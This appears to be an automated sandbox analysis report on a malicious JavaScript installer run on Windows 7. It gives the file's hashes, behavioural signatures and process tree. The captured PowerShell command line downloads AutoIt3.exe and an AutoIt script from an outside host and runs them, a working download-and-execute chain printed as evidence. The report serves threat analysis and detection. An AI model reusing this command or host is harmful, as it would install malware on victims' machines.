Analysis

- max time kernel: 118s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20231023-en
- resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
- submitted: 31-10-2023 15:32

Static task: static1

Behavioral task: behavioral1
- Sample: 31102023_2331_StartInstaller.js
- Resource: win7-20231023-en
- 4 signatures
- 150 seconds
General

- Target: 31102023_2331_StartInstaller.js
- Size: 135KB
- MD5: ddcba7389f0d1e6f2136434337077180
- SHA1: 767db09b9d97cbc4f302ec9b994541630da91d32
- SHA256: 3a9494dd4b5de532abfffc60639bd1347e41f60582954a14d7c1e32ede07d8b0
- SHA512: 0a7ed12a97e414bb2cbbd99243000ffef58b1c79ef87da8d43633b8968d0a397d77b21d1c4ee62290ebbd5c940016953a80e41f8ffa9ebad21f718a1ef064bba
- SSDEEP: 1536:hZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/04:UT9U7hgaX6eerjqlI2IO6Mzqffxu
- Score: 3/10
Malware Config
Signatures

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid    Process
    1280   powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description               pid    Process
    Token: SeDebugPrivilege   1280   powershell.exe

- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                        pid    Process        procid_target
    PID 2176 wrote to memory of 1280   2176   wscript.exe    28
    PID 2176 wrote to memory of 1280   2176   wscript.exe    28
    PID 2176 wrote to memory of 1280   2176   wscript.exe    28
Processes

- C:\Windows\system32\wscript.exe (PID: 2176)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\31102023_2331_StartInstaller.js
  Signatures:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 1280, child of 2176)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msitgileccg' -OutFile 'tgileccg.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'tgileccg.au3'"
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken